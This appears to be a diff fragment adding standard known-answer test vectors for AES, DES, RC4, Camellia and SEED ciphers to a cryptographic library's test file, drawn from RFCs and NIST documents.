+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:1 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:FCC28B8D4C63837C09E81700C1100401:1 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:8D9A9AEAC0F6596F559C6D4DAF59A5F2:1 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:6D9F200857CA6C3E9CAC524BD9ACC92A:1 
+# OFB-AES192.Decrypt 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:0 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:FCC28B8D4C63837C09E81700C1100401:0 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:8D9A9AEAC0F6596F559C6D4DAF59A5F2:0 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:6D9F200857CA6C3E9CAC524BD9ACC92A:0 
+# OFB-AES256.Encrypt 
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:1
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:4FEBDC6740D20B3AC88F6AD82A4FB08D:1
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:71AB47A086E86EEDF39D1C5BBA97C408:1
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0126141D67F37BE8538F5A8BE740E484:1
+# OFB-AES256.Decrypt 
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:0
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:4FEBDC6740D20B3AC88F6AD82A4FB08D:0
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:71AB47A086E86EEDF39D1C5BBA97C408:0
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0126141D67F37BE8538F5A8BE740E484:0
+
+# AES Counter test vectors from RFC3686
+aes-128-ctr:AE6852F8121067CC4BF7A5765577F39E:00000030000000000000000000000001:53696E676C6520626C6F636B206D7367:E4095D4FB7A7B3792D6175A3261311B8:1
+aes-128-ctr:7E24067817FAE0D743D6CE1F32539163:006CB6DBC0543B59DA48D90B00000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F:5104A106168A72D9790D41EE8EDAD388EB2E1EFC46DA57C8FCE630DF9141BE28:1
+aes-128-ctr:7691BE035E5020A8AC6E618529F9A0DC:00E0017B27777F3F4A1786F000000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F20212223:C1CF48A89F2FFDD9CF4652E9EFDB72D74540A42BDE6D7836D59A5CEAAEF3105325B2072F:1
+
+aes-192-ctr:16AF5B145FC9F579C175F93E3BFB0EED863D06CCFDB78515:0000004836733C147D6D93CB00000001:53696E676C6520626C6F636B206D7367:4B55384FE259C9C84E7935A003CBE928:1
+aes-192-ctr:7C5CB2401B3DC33C19E7340819E0F69C678C3DB8E6F6A91A:0096B03B020C6EADC2CB500D00000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F:453243FC609B23327EDFAAFA7131CD9F8490701C5AD4A79CFC1FE0FF42F4FB00:1
+aes-192-ctr:02BF391EE8ECB159B959617B0965279BF59B60A786D3E0FE:0007BDFD5CBD60278DCC091200000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F20212223:96893FC55E5C722F540B7DD1DDF7E758D288BC95C69165884536C811662F2188ABEE0935:1
+
+aes-256-ctr:776BEFF2851DB06F4C8A0542C8696F6C6A81AF1EEC96B4D37FC1D689E6C1C104:00000060DB5672C97AA8F0B200000001:53696E676C6520626C6F636B206D7367:145AD01DBF824EC7560863DC71E3E0C0:1
+aes-256-ctr:F6D66D6BD52D59BB0796365879EFF886C66DD51A5B6A99744B50590C87A23884:00FAAC24C1585EF15A43D87500000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F:F05E231B3894612C49EE000B804EB2A9B8306B508F839D6A5530831D9344AF1C:1
+aes-256-ctr:FF7A617CE69148E4F1726E2F43581DE2AA62D9F805532EDFF1EED687FB54153D:001CC5B751A51D70A1C1114800000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F20212223:EB6C52821D0BBBF7CE7594462ACA4FAAB407DF866569FD07F48CC0B583D6071F1EC0E6B8:1
+
+# DES ECB tests (from destest)
+
+DES-ECB:0000000000000000::0000000000000000:8CA64DE9C1B123A7
+DES-ECB:FFFFFFFFFFFFFFFF::FFFFFFFFFFFFFFFF:7359B2163E4EDC58
+DES-ECB:3000000000000000::1000000000000001:958E6E627A05557B
+DES-ECB:1111111111111111::1111111111111111:F40379AB9E0EC533
+DES-ECB:0123456789ABCDEF::1111111111111111:17668DFC7292532D
+DES-ECB:1111111111111111::0123456789ABCDEF:8A5AE1F81AB8F2DD
+DES-ECB:FEDCBA9876543210::0123456789ABCDEF:ED39D950FA74BCC4
+
+# DESX-CBC tests (from destest)
+DESX-CBC:0123456789abcdeff1e0d3c2b5a49786fedcba9876543210:fedcba9876543210:37363534333231204E6F77206973207468652074696D6520666F722000000000:846B2914851E9A2954732F8AA0A611C115CDC2D7951B1053A63C5E03B21AA3C4
+
+# DES EDE3 CBC tests (from destest)
+DES-EDE3-CBC:0123456789abcdeff1e0d3c2b5a49786fedcba9876543210:fedcba9876543210:37363534333231204E6F77206973207468652074696D6520666F722000000000:3FE301C962AC01D02213763C1CBD4CDC799657C064ECF5D41C673812CFDE9675
+
+# RC4 tests (from rc4test)
+RC4:0123456789abcdef0123456789abcdef::0123456789abcdef:75b7878099e0c596
+RC4:0123456789abcdef0123456789abcdef::0000000000000000:7494c2e7104b0879
+RC4:00000000000000000000000000000000::0000000000000000:de188941a3375d3a
+RC4:ef012345ef012345ef012345ef012345::0000000000000000000000000000000000000000:d6a141a7ec3c38dfbd615a1162e1c7ba36b67858
+RC4:0123456789abcdef0123456789abcdef::123456789ABCDEF0123456789ABCDEF0123456789ABCDEF012345678:66a0949f8af7d6891f7f832ba833c00c892ebe30143ce28740011ecf
+RC4:ef012345ef012345ef012345ef012345::00000000000000000000:d6a141a7ec3c38dfbd61
+
+
+# Camellia tests from RFC3713
+# For all ECB encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-ECB:key::plaintext:ciphertext:encdec
+CAMELLIA-128-ECB:0123456789abcdeffedcba9876543210::0123456789abcdeffedcba9876543210:67673138549669730857065648eabe43
+CAMELLIA-192-ECB:0123456789abcdeffedcba98765432100011223344556677::0123456789abcdeffedcba9876543210:b4993401b3e996f84ee5cee7d79b09b9
+CAMELLIA-256-ECB:0123456789abcdeffedcba987654321000112233445566778899aabbccddeeff::0123456789abcdeffedcba9876543210:9acc237dff16d76c20ef7c919e3a7509
+
+# ECB-CAMELLIA128.Encrypt
+CAMELLIA-128-ECB:000102030405060708090A0B0C0D0E0F::00112233445566778899AABBCCDDEEFF:77CF412067AF8270613529149919546F:1
+CAMELLIA-192-ECB:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF:B22F3C36B72D31329EEE8ADDC2906C68:1
+CAMELLIA-256-ECB:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF:2EDF1F3418D53B88841FC8985FB1ECF2:1
+
+# ECB-CAMELLIA128.Encrypt and ECB-CAMELLIA128.Decrypt 
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::6BC1BEE22E409F96E93D7E117393172A:432FC5DCD628115B7C388D770B270C96
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::AE2D8A571E03AC9C9EB76FAC45AF8E51:0BE1F14023782A22E8384C5ABB7FAB2B
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::30C81C46A35CE411E5FBC1191A0A52EF:A0A1ABCD1893AB6FE0FE5B65DF5F8636
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::F69F2445DF4F9B17AD2B417BE66C3710:E61925E0D5DFAA9BB29F815B3076E51A
+
+# ECB-CAMELLIA192.Encrypt and ECB-CAMELLIA192.Decrypt 
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::6BC1BEE22E409F96E93D7E117393172A:CCCC6C4E138B45848514D48D0D3439D3
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::AE2D8A571E03AC9C9EB76FAC45AF8E51:5713C62C14B2EC0F8393B6AFD6F5785A
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::30C81C46A35CE411E5FBC1191A0A52EF:B40ED2B60EB54D09D030CF511FEEF366
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::F69F2445DF4F9B17AD2B417BE66C3710:909DBD95799096748CB27357E73E1D26
+
+# ECB-CAMELLIA256.Encrypt and ECB-CAMELLIA256.Decrypt 
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::6BC1BEE22E409F96E93D7E117393172A:BEFD219B112FA00098919CD101C9CCFA
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::AE2D8A571E03AC9C9EB76FAC45AF8E51:C91D3A8F1AEA08A9386CF4B66C0169EA
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::30C81C46A35CE411E5FBC1191A0A52EF:A623D711DC5F25A51BB8A80D56397D28
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::F69F2445DF4F9B17AD2B417BE66C3710:7960109FB6DC42947FCFE59EA3C5EB6B
+
+# For all CBC encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-CBC:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CBC-CAMELLIA128.Encrypt and CBC-CAMELLIA128.Decrypt 
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:1607CF494B36BBF00DAEB0B503C831AB
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:1607CF494B36BBF00DAEB0B503C831AB:AE2D8A571E03AC9C9EB76FAC45AF8E51:A2F2CF671629EF7840C5A5DFB5074887
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:A2F2CF671629EF7840C5A5DFB5074887:30C81C46A35CE411E5FBC1191A0A52EF:0F06165008CF8B8B5A63586362543E54
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:36A84CDAFD5F9A85ADA0F0A993D6D577:F69F2445DF4F9B17AD2B417BE66C3710:74C64268CDB8B8FAF5B34E8AF3732980
+
+# CBC-CAMELLIA192.Encrypt and CBC-CAMELLIA192.Decrypt 
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:2A4830AB5AC4A1A2405955FD2195CF93
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:2A4830AB5AC4A1A2405955FD2195CF93:AE2D8A571E03AC9C9EB76FAC45AF8E51:5D5A869BD14CE54264F892A6DD2EC3D5
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:5D5A869BD14CE54264F892A6DD2EC3D5:30C81C46A35CE411E5FBC1191A0A52EF:37D359C3349836D884E310ADDF68C449
+CAMELLIA-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:37D359C3349836D884E310ADDF68C449:F69F2445DF4F9B17AD2B417BE66C3710:01FAAA930B4AB9916E9668E1428C6B08
+
+# CBC-CAMELLIA256.Encrypt and CBC-CAMELLIA256.Decrypt 
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:E6CFA35FC02B134A4D2C0B6737AC3EDA
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E6CFA35FC02B134A4D2C0B6737AC3EDA:AE2D8A571E03AC9C9EB76FAC45AF8E51:36CBEB73BD504B4070B1B7DE2B21EB50
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:36CBEB73BD504B4070B1B7DE2B21EB50:30C81C46A35CE411E5FBC1191A0A52EF:E31A6055297D96CA3330CDF1B1860A83
+CAMELLIA-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E31A6055297D96CA3330CDF1B1860A83:F69F2445DF4F9B17AD2B417BE66C3710:5D563F6D1CCCF236051C0C5C1C58F28F
+
+# We don't support CFB{1,8}-CAMELLIAxxx.{En,De}crypt
+# For all CFB128 encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-CFB:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CFB128-CAMELLIA128.Encrypt 
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:1
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:14F7646187817EB586599146B82BD719:AE2D8A571E03AC9C9EB76FAC45AF8E51:A53D28BB82DF741103EA4F921A44880B:1
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:A53D28BB82DF741103EA4F921A44880B:30C81C46A35CE411E5FBC1191A0A52EF:9C2157A664626D1DEF9EA420FDE69B96:1
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:9C2157A664626D1DEF9EA420FDE69B96:F69F2445DF4F9B17AD2B417BE66C3710:742A25F0542340C7BAEF24CA8482BB09:1
+
+# CFB128-CAMELLIA128.Decrypt 
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:0
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:14F7646187817EB586599146B82BD719:AE2D8A571E03AC9C9EB76FAC45AF8E51:A53D28BB82DF741103EA4F921A44880B:0
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:A53D28BB82DF741103EA4F921A44880B:30C81C46A35CE411E5FBC1191A0A52EF:9C2157A664626D1DEF9EA420FDE69B96:0
+CAMELLIA-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:9C2157A664626D1DEF9EA420FDE69B96:F69F2445DF4F9B17AD2B417BE66C3710:742A25F0542340C7BAEF24CA8482BB09:0
+
+# CFB128-CAMELLIA192.Encrypt
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:1
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:C832BB9780677DAA82D9B6860DCD565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:86F8491627906D780C7A6D46EA331F98:1
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:86F8491627906D780C7A6D46EA331F98:30C81C46A35CE411E5FBC1191A0A52EF:69511CCE594CF710CB98BB63D7221F01:1
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:69511CCE594CF710CB98BB63D7221F01:F69F2445DF4F9B17AD2B417BE66C3710:D5B5378A3ABED55803F25565D8907B84:1
+
+# CFB128-CAMELLIA192.Decrypt
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:0
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:C832BB9780677DAA82D9B6860DCD565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:86F8491627906D780C7A6D46EA331F98:0
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:86F8491627906D780C7A6D46EA331F98:30C81C46A35CE411E5FBC1191A0A52EF:69511CCE594CF710CB98BB63D7221F01:0
+CAMELLIA-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:69511CCE594CF710CB98BB63D7221F01:F69F2445DF4F9B17AD2B417BE66C3710:D5B5378A3ABED55803F25565D8907B84:0
+
+# CFB128-CAMELLIA256.Encrypt 
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:1
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:CF6107BB0CEA7D7FB1BD31F5E7B06C93:AE2D8A571E03AC9C9EB76FAC45AF8E51:89BEDB4CCDD864EA11BA4CBE849B5E2B:1
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:89BEDB4CCDD864EA11BA4CBE849B5E2B:30C81C46A35CE411E5FBC1191A0A52EF:555FC3F34BDD2D54C62D9E3BF338C1C4:1
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:555FC3F34BDD2D54C62D9E3BF338C1C4:F69F2445DF4F9B17AD2B417BE66C3710:5953ADCE14DB8C7F39F1BD39F359BFFA:1
+
+# CFB128-CAMELLIA256.Decrypt 
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:0
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:CF6107BB0CEA7D7FB1BD31F5E7B06C93:AE2D8A571E03AC9C9EB76FAC45AF8E51:89BEDB4CCDD864EA11BA4CBE849B5E2B:0
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:89BEDB4CCDD864EA11BA4CBE849B5E2B:30C81C46A35CE411E5FBC1191A0A52EF:555FC3F34BDD2D54C62D9E3BF338C1C4:0
+CAMELLIA-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:555FC3F34BDD2D54C62D9E3BF338C1C4:F69F2445DF4F9B17AD2B417BE66C3710:5953ADCE14DB8C7F39F1BD39F359BFFA:0
+
+# For all OFB encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-OFB:key:IV/output':plaintext:ciphertext:encdec
+# OFB-CAMELLIA128.Encrypt 
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:1
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:25623DB569CA51E01482649977E28D84:1
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:C776634A60729DC657D12B9FCA801E98:1
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:D776379BE0E50825E681DA1A4C980E8E:1
+
+# OFB-CAMELLIA128.Decrypt 
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:14F7646187817EB586599146B82BD719:0
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:25623DB569CA51E01482649977E28D84:0
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:C776634A60729DC657D12B9FCA801E98:0
+CAMELLIA-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:D776379BE0E50825E681DA1A4C980E8E:0
+
+# OFB-CAMELLIA192.Encrypt 
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:1
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:8ECEB7D0350D72C7F78562AEBDF99339:1
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:BDD62DBBB9700846C53B507F544696F0:1
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:E28014E046B802F385C4C2E13EAD4A72:1
+
+# OFB-CAMELLIA192.Decrypt 
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:C832BB9780677DAA82D9B6860DCD565E:0
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:8ECEB7D0350D72C7F78562AEBDF99339:0
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:BDD62DBBB9700846C53B507F544696F0:0
+CAMELLIA-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:E28014E046B802F385C4C2E13EAD4A72:0
+
+# OFB-CAMELLIA256.Encrypt 
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:1
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:127AD97E8E3994E4820027D7BA109368:1
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:6BFF6265A6A6B7A535BC65A80B17214E:1
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0A4A0404E26AA78A27CB271E8BF3CF20:1
+
+# OFB-CAMELLIA256.Decrypt 
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CF6107BB0CEA7D7FB1BD31F5E7B06C93:0
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:127AD97E8E3994E4820027D7BA109368:0
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:6BFF6265A6A6B7A535BC65A80B17214E:0
+CAMELLIA-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0A4A0404E26AA78A27CB271E8BF3CF20:0
+
+# SEED test vectors from RFC4269
+SEED-ECB:00000000000000000000000000000000::000102030405060708090A0B0C0D0E0F:5EBAC6E0054E166819AFF1CC6D346CDB:0
+SEED-ECB:000102030405060708090A0B0C0D0E0F::00000000000000000000000000000000:C11F22F20140505084483597E4370F43:0
+SEED-ECB:4706480851E61BE85D74BFB3FD956185::83A2F8A288641FB9A4E9A5CC2F131C7D:EE54D13EBCAE706D226BC3142CD40D4A:0
+SEED-ECB:28DBC3BC49FFD87DCFA509B11D422BE7::B41E6BE2EBA84A148E2EED84593C5EC7:9B9B7BFCD1813CB95D0B3618F40F5122:0
+SEED-ECB:00000000000000000000000000000000::000102030405060708090A0B0C0D0E0F:5EBAC6E0054E166819AFF1CC6D346CDB:1
+SEED-ECB:000102030405060708090A0B0C0D0E0F::00000000000000000000000000000000:C11F22F20140505084483597E4370F43:1
+SEED-ECB:4706480851E61BE85D74BFB3FD956185::83A2F8A288641FB9A4E9A5CC2F131C7D:EE54D13EBCAE706D226BC3142CD40D4A:1
+SEED-ECB:28DBC3BC49FFD87DCFA509B11D422BE7::B41E6BE2EBA84A148E2EED84593C5EC7:9B9B7BFCD1813CB95D0B3618F40F5122:1
+
+# AES CCM 256 bit key
+aes-256-ccm:1bde3251d41a8b5ea013c195ae128b218b3e0306376357077ef1c1c78548b92e:5b8e40746f6b98e00f1d13ff41:53bd72a97089e312422bf72e242377b3c6ee3e2075389b999c4ef7f28bd2b80a:9a5fcccdb4cf04e7293d2775cc76a488f042382d949b43b7d6bb2b9864786726:c17a32514eb6103f3249e076d4c871dc97e04b286699e54491dc18f6d734d4c0:2024931d73bca480c24a24ece6b6c2bf
+
+# AES GCM test vectors from http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/gcm/gcm-spec.pdf
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000::::58e2fccefa7e3061367f1d57a4e7455a
+aes-128-gcm:00000000000000000000000000000000:000000000000000000000000:00000000000000000000000000000000:0388dace60b6a392f328c2b971b2fe78::ab6e47d42cec13bdf53a67b21257bddf
